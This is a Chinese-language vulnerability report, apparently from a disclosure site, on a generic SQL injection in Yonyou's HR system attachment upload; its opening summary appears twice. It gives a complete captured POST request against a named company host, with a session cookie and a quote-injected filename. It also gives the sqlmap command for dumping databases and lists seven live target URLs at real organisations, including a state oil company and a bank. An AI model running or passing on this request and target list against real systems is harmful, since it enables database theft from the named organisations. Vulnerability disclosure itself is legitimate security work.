### 简要描述: 用友人力资源系统通用SQL注入 很多大型的企业中招 ### 详细说明: 如中国海洋石油总公司、顺德农商银行、湖北能源集团股份有限公司、华信信托股份有限公司等 漏洞出现在上传的页面: burpsuite抓包保存为post.txt: ``` POST /hrss/attach.upload.d?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX* HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: multipart/form-data; boundary=---------------------------7df36929c057c Accept-Encoding: gzip, deflate Host: nc.hbny.com.cn:9090 Content-Length: 507 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=0000wqBKC1wT2dZGLDkt-fcdLZZ:194gm84q8 -----------------------------7df36929c057c Content-Disposition: form-data; name="txtFileName"; filename="0.png'" Content-Type: image/x-png GIF89aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -----------------------------7df36929c057c-- ``` 可以直接用sqlmap跑数据:...
### 简要描述: 用友人力资源系统通用SQL注入 很多大型的企业中招 ### 详细说明: 如中国海洋石油总公司、顺德农商银行、湖北能源集团股份有限公司、华信信托股份有限公司等 漏洞出现在上传的页面: burpsuite抓包保存为post.txt: ``` POST /hrss/attach.upload.d?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX* HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Content-Type: multipart/form-data; boundary=---------------------------7df36929c057c Accept-Encoding: gzip, deflate Host: nc.hbny.com.cn:9090 Content-Length: 507 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=0000wqBKC1wT2dZGLDkt-fcdLZZ:194gm84q8 -----------------------------7df36929c057c Content-Disposition: form-data; name="txtFileName"; filename="0.png'" Content-Type: image/x-png GIF89aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa -----------------------------7df36929c057c-- ``` 可以直接用sqlmap跑数据: sqlmap.py -r post.txt [<img src="https://images.seebug.org/upload/201501/202158074569848f812f3bd7d410c551c3a02929.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/202158074569848f812f3bd7d410c551c3a02929.png) 跑出的数据: [<img src="https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png) 案例: http://nc.hbny.com.cn:9090/hrss/rm/RmMain.jsp?dsName=hbny http://www.ccepc.com:803/hrss/rm/RmMain.jsp?dsName=nchr http://ehr.hgtech.com.cn/hrss/rm/RmMain.jsp?dsName=HRDB http://zhaopin.cnooc.com.cn/hrss/rm/school/school_rmmain.jsp?dsName=design http://218.25.171.128:38080/hrss/rm/RmMain.jsp?dsName=dlhx http://121.33.247.53:9080/hrss/rm/RmMain.jsp?dsName=gzhrdata56 http://59.173.0.46:8070/hrss/rm/RmMain.jsp?dsName=nc57zywk ### 漏洞证明: 跑出的数据: [<img src="https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2022042860b874022f1c713168e049d596f0da7d.png)